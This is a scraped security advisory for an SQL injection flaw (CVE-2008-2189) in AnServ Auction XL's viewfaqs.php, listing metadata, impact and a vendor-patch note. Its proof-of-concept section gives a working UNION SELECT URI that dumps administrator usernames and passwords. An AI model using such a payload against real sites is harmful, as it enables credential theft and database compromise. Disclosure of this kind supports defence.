AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
BID:29053
Info
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
| Bugtraq ID: | 29053 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2189 |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | M.Hasran Addahroni |
| Vulnerable: |
AnServ Auction XL 0 |
| Not Vulnerable: | |
Discussion
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
AnServ Auction XL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AnServ Auction XL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a,password)%20from PHPAUCTIONXL_adminusers--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a,password)%20from PHPAUCTIONXL_adminusers--
Solution / Fix
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
Solution:
Patches are available for registered users. Please contact the vendor for information on obtaining and installing the updates.
Solution:
Patches are available for registered users. Please contact the vendor for information on obtaining and installing the updates.
References
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
References:
References: